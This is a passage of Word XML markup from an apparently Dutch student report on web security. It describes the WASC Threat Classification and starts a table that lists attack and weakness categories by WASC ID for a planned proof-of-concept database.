      <w:r w:rsidR="00F12D3B">
        <w:t xml:space="preserve">heeft als hoofddoel om standaarden te produceren voor web security. </w:t>
      </w:r>
      <w:r w:rsidR="003D7C20">
        <w:t xml:space="preserve">Zij en hun community zetten projecten op om dit doel te bereiken. </w:t>
      </w:r>
      <w:r w:rsidR="00114266">
        <w:t>Zoals eerder vermeld zijn er t</w:t>
      </w:r>
      <w:r w:rsidR="003D7C20">
        <w:t xml:space="preserve">wee </w:t>
      </w:r>
      <w:r w:rsidR="00114266">
        <w:t xml:space="preserve">projecten </w:t>
      </w:r>
      <w:r w:rsidR="003D7C20">
        <w:t>releva</w:t>
      </w:r>
      <w:r w:rsidR="00114266">
        <w:t>nt voor mijn onderzoek:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4678"/>
      </w:tblGrid>
      <w:tr w:rsidR="004B55A6" w14:paraId="34258A2D" w14:textId="77777777" w:rsidTr="008E50BA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4678" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59ABF010" w14:textId="77777777" w:rsidR="004B55A6" w:rsidRDefault="004B55A6" w:rsidP="008E50BA">
            <w:r>
              <w:t>Project</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B55A6" w:rsidRPr="00F12D3B" w14:paraId="044EC9A5" w14:textId="77777777" w:rsidTr="008E50BA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4678" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="789EEF49" w14:textId="6A3BD0A3" w:rsidR="004B55A6" w:rsidRPr="00DE1933" w:rsidRDefault="00DD7292" w:rsidP="008E50BA">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>WASC Threat Classification</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B55A6" w:rsidRPr="00422628" w14:paraId="53342A03" w14:textId="77777777" w:rsidTr="008E50BA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4678" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09F33B3C" w14:textId="49010EFC" w:rsidR="004B55A6" w:rsidRPr="00DE1933" w:rsidRDefault="00DD7292" w:rsidP="008E50BA">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE1933">
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>Web Application Security Scanner Evaluation Criteria</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0C9E3E83" w14:textId="77777777" w:rsidR="00DD7292" w:rsidRDefault="00DD7292" w:rsidP="00C41D9B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EC2E21D" w14:textId="5BECBF78" w:rsidR="005319D8" w:rsidRDefault="00F1463F" w:rsidP="00C41D9B">
      <w:r w:rsidRPr="00F1463F">
        <w:t xml:space="preserve">Het doel van het project </w:t>
      </w:r>
      <w:r w:rsidR="00D21E29" w:rsidRPr="00F1463F">
        <w:t xml:space="preserve">WASC </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D21E29" w:rsidRPr="00F1463F">
        <w:t>Threat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D21E29" w:rsidRPr="00F1463F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D21E29" w:rsidRPr="00F1463F">
        <w:t>Classification</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00450C25">
        <w:t xml:space="preserve"> (bedreiging classificering)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F1463F">
        <w:t xml:space="preserve"> is om</w:t>
      </w:r>
      <w:r w:rsidR="00FF6008">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00450C25">
        <w:t>threats</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00450C25">
        <w:t xml:space="preserve"> (be</w:t>
      </w:r>
      <w:r w:rsidR="00FF6008">
        <w:t>dreigingen</w:t>
      </w:r>
      <w:r w:rsidR="00450C25">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00FF6008">
        <w:t xml:space="preserve"> voor webapplicaties te</w:t>
      </w:r>
      <w:r w:rsidRPr="00F1463F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00273C52">
        <w:t>classificeren</w:t>
      </w:r>
      <w:r w:rsidR="00FF6008">
        <w:t xml:space="preserve">. WASC </w:t>
      </w:r>
      <w:r w:rsidR="00B66F62">
        <w:t>deelt de</w:t>
      </w:r>
      <w:r w:rsidR="00FF6008">
        <w:t xml:space="preserve"> dreigingen op in twee klassen/types: Aanvallen en </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001510E5">
        <w:t>weaknesses</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001510E5">
        <w:t xml:space="preserve"> (k</w:t>
      </w:r>
      <w:r w:rsidR="00FF6008">
        <w:t>wetsbaarheden</w:t>
      </w:r>
      <w:r w:rsidR="001510E5">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00FF6008">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00450C25">
        <w:t xml:space="preserve">Een lijst van de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00450C25">
        <w:t>Threat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00450C25">
        <w:t xml:space="preserve"> Classes (bedreiging </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00450C25">
        <w:t>klasses</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00450C25">
        <w:t>) is te vinden op de website van WASC (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00450C25">
        <w:t>wasc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00450C25">
        <w:t xml:space="preserve">, bronnenlijst). </w:t>
      </w:r>
      <w:r w:rsidR="008657CA">
        <w:t>Elke dreiging heeft een WASC ID waarmee deze ge</w:t>
      </w:r>
      <w:r w:rsidR="0054658E">
        <w:t>ïdentificeerd kan worden</w:t>
      </w:r>
      <w:r w:rsidR="00450C25">
        <w:t xml:space="preserve"> en een detail pagina waar er een defini</w:t>
      </w:r>
      <w:r w:rsidR="00E4387F">
        <w:t xml:space="preserve">tie wordt gegeven van de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E4387F">
        <w:t>threat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E4387F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00737E63">
        <w:t>en voorbeelden</w:t>
      </w:r>
      <w:r w:rsidR="0054658E">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00B77378">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0062456B">
        <w:t xml:space="preserve">WASC gebruikt andere termen om </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0062456B">
        <w:t>threats</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0062456B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CA6FB2">
        <w:t>beschrijven</w:t>
      </w:r>
      <w:r w:rsidR="00F92B1D">
        <w:t xml:space="preserve"> dan OWASP</w:t>
      </w:r>
      <w:r w:rsidR="00F70248">
        <w:t xml:space="preserve">, bij OWASP zijn alle </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F70248">
        <w:t>threats</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F70248">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003D27A8">
        <w:t>vulnerabilities</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005B4F42">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00F70248">
        <w:t>kwetsbaarheden</w:t>
      </w:r>
      <w:r w:rsidR="005B4F42">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00CA6FB2">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0062456B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73ADC696" w14:textId="47E47955" w:rsidR="008B6093" w:rsidRDefault="00CB4E22" w:rsidP="00C41D9B">
      <w:r>
        <w:t>Deze lijst zoals de “</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>OWASP top</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 10 lijst” </w:t>
      </w:r>
      <w:r w:rsidR="00A15E6F">
        <w:t xml:space="preserve">zal ik gebruiken in mijn </w:t>
      </w:r>
      <w:r w:rsidR="006D3CD7">
        <w:t xml:space="preserve">software applicatie </w:t>
      </w:r>
      <w:r w:rsidR="00756FEE">
        <w:t>om kwetsbaarheden en aanvallen te kunnen identificeren en definiëren</w:t>
      </w:r>
      <w:r w:rsidR="00344125">
        <w:t xml:space="preserve"> en zal dus in de datastructuur van mijn database model opgenomen worden.</w:t>
      </w:r>
      <w:r w:rsidR="00C65259">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CF21DF">
        <w:t xml:space="preserve">Niet alle aanvallen of kwetsbaarheden zijn die opgenomen zijn hebben een directe betrekking op de webapplicatie. Een aanval zoals </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CF21DF">
        <w:t>Denial</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CF21DF">
        <w:t xml:space="preserve"> of Service (</w:t>
      </w:r>
      <w:r w:rsidR="00612A91">
        <w:t>WASC-10</w:t>
      </w:r>
      <w:r w:rsidR="00CF21DF">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00C42999">
        <w:t xml:space="preserve"> is een objectieve aanval op de server en niet de webapplicatie.</w:t>
      </w:r>
      <w:r w:rsidR="00CF21DF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0062456B">
        <w:t>J</w:t>
      </w:r>
      <w:r w:rsidR="00FF14C4">
        <w:t xml:space="preserve">e zal een aantal </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FF14C4">
        <w:t>threats</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0062456B">
        <w:t xml:space="preserve"> tegenkomen </w:t>
      </w:r>
      <w:r w:rsidR="00FF14C4">
        <w:t xml:space="preserve">die al in de </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00FF14C4">
        <w:t>OWASP deel</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00FF14C4">
        <w:t xml:space="preserve"> zijn behandeld.</w:t>
      </w:r>
      <w:r w:rsidR="00996A88">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C147E3">
        <w:t xml:space="preserve">Voor het </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C147E3">
        <w:t>Proof</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C147E3">
        <w:t xml:space="preserve"> of Concept zal ik een aantal aanvallen van de WACS lijst met definitie opnemen in de webapplicatie.</w:t>
      </w:r>
      <w:r w:rsidR="000E5086">
        <w:t xml:space="preserve"> Deze zal ik in de tabel markeren.</w:t>
      </w:r>
      <w:r w:rsidR="00FF14C4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BAC6DB" w14:textId="77777777" w:rsidR="009B1148" w:rsidRDefault="00CA2068" w:rsidP="00C41D9B">
      <w:r>
        <w:t xml:space="preserve">De geïdentificeerde </w:t>
      </w:r>
      <w:r w:rsidR="009B1148">
        <w:t>en gedefinieerde aanvallen en kwetsbaarheden zijn:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1043"/>
        <w:gridCol w:w="4072"/>
        <w:gridCol w:w="3947"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C4355C" w14:paraId="0FB24774" w14:textId="09E801AE" w:rsidTr="00C4355C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1043" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4FE6F45E" w14:textId="6DF30BB9" w:rsidR="00C4355C" w:rsidRDefault="00C4355C" w:rsidP="00C41D9B">
            <w:r>
              <w:t>WACS ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4072" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A39A897" w14:textId="79B295B7" w:rsidR="00C4355C" w:rsidRDefault="00C4355C" w:rsidP="00C41D9B">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Threats</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3947" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24952BEE" w14:textId="2FED9826" w:rsidR="00C4355C" w:rsidRDefault="00C4355C" w:rsidP="00C41D9B">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Threat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C4355C" w14:paraId="096B766F" w14:textId="09C31A63" w:rsidTr="00C4355C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1043" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="456BEF4D" w14:textId="6A4197DE" w:rsidR="00C4355C" w:rsidRDefault="007F5385" w:rsidP="00C41D9B">
            <w:r>
              <w:t>WASC-42</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4072" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58C845B9" w14:textId="05A76422" w:rsidR="00C4355C" w:rsidRDefault="0062456B" w:rsidP="00C41D9B">
            <w:r>
              <w:t>Aanvallen</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3947" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1CD80209" w14:textId="26BA358C" w:rsidR="00C4355C" w:rsidRDefault="00FF14C4" w:rsidP="00C41D9B">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Abuse</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> of </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>functionality</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C4355C" w14:paraId="6B208109" w14:textId="25D2E458" w:rsidTr="00C4355C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1043" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7AAB2603" w14:textId="06926D5C" w:rsidR="00C4355C" w:rsidRDefault="00210DAB" w:rsidP="00C41D9B">
            <w:r>
              <w:t>WASC-11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4072" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12DE28F2" w14:textId="6B2B4FDD" w:rsidR="00C4355C" w:rsidRDefault="0062456B" w:rsidP="00C41D9B">
            <w:r>
              <w:t>Aanvallen</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3947" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="268ECBFA" w14:textId="47D2ADA1" w:rsidR="00C4355C" w:rsidRDefault="00FF14C4" w:rsidP="00C41D9B">
            <w:r>
              <w:t>Brute Force</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C4355C" w14:paraId="0CDEF67C" w14:textId="4F33FEA6" w:rsidTr="00C4355C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1043" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59031C19" w14:textId="7677F2F2" w:rsidR="00C4355C" w:rsidRPr="00A72BD2" w:rsidRDefault="00210DAB" w:rsidP="00C41D9B">
            <w:pPr>
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A72BD2">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>WASC-19</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4072" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6759BF39" w14:textId="1C3EBB61" w:rsidR="00C4355C" w:rsidRPr="00A72BD2" w:rsidRDefault="0062456B" w:rsidP="00C41D9B">
            <w:pPr>
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A72BD2">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>Aanvallen</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3947" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18BD156D" w14:textId="0A88A347" w:rsidR="00C4355C" w:rsidRPr="00A72BD2" w:rsidRDefault="007F5385" w:rsidP="007F5385">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="center" w:pos="1865"/>
              </w:tabs>
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A72BD2">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t xml:space="preserve">SQL </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00A72BD2">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>Injection</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C4355C" w14:paraId="0B5647C3" w14:textId="28EBB863" w:rsidTr="00C4355C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1043" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="60A2A4DF" w14:textId="0F7C7AD5" w:rsidR="00C4355C" w:rsidRDefault="00564AD5" w:rsidP="00C41D9B">
            <w:r>
              <w:t>WASC-12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4072" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A9BF732" w14:textId="14999D7A" w:rsidR="00C4355C" w:rsidRDefault="0062456B" w:rsidP="00C41D9B">
            <w:r>
              <w:t>Aanvallen</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3947" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="760D73DF" w14:textId="619344FC" w:rsidR="00C4355C" w:rsidRDefault="00FF14C4" w:rsidP="00C41D9B">
            <w:r>
              <w:t>Content</w:t>
            </w:r>
            <w:r w:rsidR="00B24EF5">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00B24EF5">
              <w:t>Spoofin</w:t>
            </w:r>
            <w:r w:rsidR="005F57CF">
              <w:t>g</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C4355C" w14:paraId="3E525417" w14:textId="7D231DE8" w:rsidTr="00C4355C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1043" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="080BA9FB" w14:textId="24459FBB" w:rsidR="00C4355C" w:rsidRDefault="00F9236D" w:rsidP="00C41D9B">
            <w:r>
              <w:t>WASC-18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4072" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4284C71E" w14:textId="0B37C41D" w:rsidR="00C4355C" w:rsidRDefault="0062456B" w:rsidP="00C41D9B">
            <w:r>
              <w:t>Aanvallen</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3947" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="473F3CB3" w14:textId="35B2C951" w:rsidR="00C4355C" w:rsidRDefault="00151CEE" w:rsidP="00C41D9B">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Credential</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Session</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Predicition</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C4355C" w14:paraId="17B059E3" w14:textId="60087CC3" w:rsidTr="00C4355C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1043" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7770CF4B" w14:textId="0E446ED0" w:rsidR="00C4355C" w:rsidRPr="00A72BD2" w:rsidRDefault="00FB5FF2" w:rsidP="00C41D9B">
            <w:pPr>
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A72BD2">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>WASC-8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4072" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3DCD6163" w14:textId="517B6102" w:rsidR="00C4355C" w:rsidRPr="00A72BD2" w:rsidRDefault="0062456B" w:rsidP="00C41D9B">
            <w:pPr>
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A72BD2">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>Aanvallen</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3947" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40A72798" w14:textId="235D3828" w:rsidR="00C4355C" w:rsidRPr="00A72BD2" w:rsidRDefault="002A117B" w:rsidP="00C41D9B">
            <w:pPr>
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A72BD2">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>Cross-Site Scripting</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C4355C" w14:paraId="1D811A3F" w14:textId="67A6DB7E" w:rsidTr="00C4355C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1043" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="637520DF" w14:textId="63163B95" w:rsidR="00C4355C" w:rsidRDefault="008852CA" w:rsidP="00C41D9B">
            <w:r>
              <w:t>WASC-9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4072" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F7AE8D3" w14:textId="10EE3796" w:rsidR="00C4355C" w:rsidRDefault="0062456B" w:rsidP="00C41D9B">
            <w:r>
              <w:t>Aanvallen</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3947" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="073F527C" w14:textId="47D585FB" w:rsidR="00C4355C" w:rsidRDefault="002A117B" w:rsidP="00C41D9B">
            <w:r>
              <w:t xml:space="preserve">Cross-Site Request </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Forgery</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002836D1" w14:paraId="1CE4E6CF" w14:textId="77777777" w:rsidTr="00C4355C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1043" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25919AB5" w14:textId="6C9A43A6" w:rsidR="002836D1" w:rsidRDefault="00ED5122" w:rsidP="00C41D9B">
            <w:r>
              <w:t>WAC-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4072" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5DE8E3A6" w14:textId="39C744A8" w:rsidR="002836D1" w:rsidRDefault="002836D1" w:rsidP="00C41D9B">
            <w:r>
              <w:t>Aanvallen</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3947" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A724599" w14:textId="23AF09DA" w:rsidR="002836D1" w:rsidRDefault="00CF21DF" w:rsidP="00C41D9B">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Denial</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> of Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002836D1" w14:paraId="0A1F8321" w14:textId="77777777" w:rsidTr="00C4355C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1043" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3CAC7E8A" w14:textId="6919B33B" w:rsidR="002836D1" w:rsidRDefault="0082028D" w:rsidP="00C41D9B">
            <w:r>
              <w:t>WASC-15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4072" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="407F47FA" w14:textId="0917BC83" w:rsidR="002836D1" w:rsidRDefault="001510E5" w:rsidP="00C41D9B">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Weaknesses</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3947" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6DF92579" w14:textId="079AEB6A" w:rsidR="002836D1" w:rsidRDefault="007B0E31" w:rsidP="00C41D9B">
            <w:r>
              <w:t xml:space="preserve">Application </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Misconfiguration</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002836D1" w14:paraId="26C176E5" w14:textId="77777777" w:rsidTr="00C4355C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1043" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E175A5B" w14:textId="3832AB3C" w:rsidR="002836D1" w:rsidRDefault="008A5B7F" w:rsidP="00C41D9B">
            <w:r>
              <w:t>WASC-16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
